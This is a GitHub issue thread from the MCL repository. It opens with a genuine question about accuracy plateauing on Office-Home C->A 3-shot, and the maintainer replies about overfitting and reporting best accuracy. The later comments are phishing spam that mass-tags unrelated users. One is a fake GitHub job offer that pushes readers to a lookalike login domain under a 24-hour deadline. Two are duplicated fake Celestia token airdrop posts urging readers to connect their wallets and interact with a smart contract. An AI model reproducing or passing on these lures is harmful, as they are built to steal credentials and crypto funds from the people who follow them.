### ISSUE TITLE
a question of acc

### ISSUE THREAD

**Issue by Amos1109** [chester256/MCL#3]
Hello, thank you very much for your work! But when I was performing the experiment (office_home, C->A, 3shot), when the number of iterations exceeds 9000 times, acc, acc1, mAcc, mAcc1 do not change, always 69.80 (acc1, acc2, 71.40 in paper)  and 64.11(mAcc1, mAcc2), am I missing an important step?

**Comment by chester256** [comment]
Hi, as the scale of office-home is very small, the accuracy may fluctuate a lot for different runnings. Besides, we empirically found that MCL may overfit the office-home if you train it in a very long time, so we report the best-accuracy for office-home, not the final accuracy.

**Comment by Amos1109** [comment]
Because of overfitting, the best test accuracy is not when the validation set is optimal, right?

**Comment by AartiKushwaha** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
suwardhana, @talipkorkmaz, @CrazyBonze, @sponnusa, @yebenes, @jetaggart, @vasyl-pahut, @COOLasHEL, @agiza1, @praneybehl, @jkurb, @Rajesh3009, @rrubanov, @TheOnlyBeardedBeast, @zelcam, @ajays97, @chokanche, @daveyang-code, @hynamedev, @kaifatwork

**Comment by Jcillo507** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://celestia.eigenllayer.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://celestia.eigenllayer.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!2T2K, @luxiao, @sjsjsj1246, @destawala, @IndicareLeve, @include, @kaifatwork, @gri3li, @Sandalots, @SirDavidG, @maxgfr, @Allaaann, @Boyquotes, @stefanciprian, @thragusjr, @alanwu4321, @davyrolink, @venom90, @esinanturan, @hnq90

**Comment by Jcillo507** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://celestia.eigenllayer.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://celestia.eigenllayer.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!corysimmons, @Matteoll42, @selcuke, @jugurtha114, @sigirya, @tonnystark, @topdollar3, @kunphonui, @theultimate1, @jsquardo, @merovinh, @zeekDev0, @mikedemarais, @hastalamuerte, @JiJingYu, @davkorss, @cookavich, @f13end, @stasb, @bitcoinvsalts
